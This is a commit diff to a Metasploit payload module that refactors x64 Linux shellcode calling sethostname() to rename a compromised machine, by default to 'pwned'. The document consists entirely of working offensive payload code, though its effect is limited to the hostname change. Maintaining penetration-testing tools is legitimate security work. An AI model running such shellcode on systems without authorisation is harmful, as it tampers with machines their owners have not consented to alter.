Rewriting shellcode, making it smaller

msutovsky-r7 · msutovsky-r7 · commit d0df343f74d0 · 2025-07-04T12:12:00.000+02:00
diff --git a/modules/payloads/singles/linux/x64/set_hostname.rb b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -3,46 +3,48 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-module MetasploitModule 
-
+module MetasploitModule
   CachedSize = 28
-  
+
   include Msf::Payload::Single
   include Msf::Payload::Linux
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Linux Set Hostname',
-      'Description' => 'Sets the hostname of the machine.',
-      'Author'      => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'linux',
-      'Arch'        => ARCH_X64,
-      'Privileged'  => true
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Set Hostname',
+        'Description' => 'Sets the hostname of the machine.',
+        'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_X64,
+        'Privileged' => true
+      )
+    )
 
     register_options(
       [
-        OptString.new('HOSTNAME', [true, 'The hostname to set.','pwned'])
-      ])
+        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
+      ]
+    )
   end
 
   def generate(_opts = {})
     hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
     length = hostname.length
     if length > 0xff
-      fail_with(Msf::Module::Failure::BadConfig, "HOSTNAME must be less than 255 characters.")
+      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
     end
 
-    payload = %Q^
-      xor rax, rax
-      xor rsi, rsi
-      push rax    ; push the null byte of the hostname string to stack.
-      mov al, 170 ; sethostname() syscall number.
+    payload = %^
+      push 170 ; sethostname() syscall number.
+      pop rax
       jmp str
 
     end:
-      mov sil, #{length}
+      push #{length}
+      pop rsi
       pop rdi    ; rdi points to the hostname string.
       syscall
       ret        ; break the loop by causing segfault.
@@ -52,6 +54,6 @@ def generate(_opts = {})
       db "#{hostname}"
     ^
 
-    Metasm::Shellcode.assemble(Metasm::X64.new,payload).encode_string
+    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
   end
-end
+end
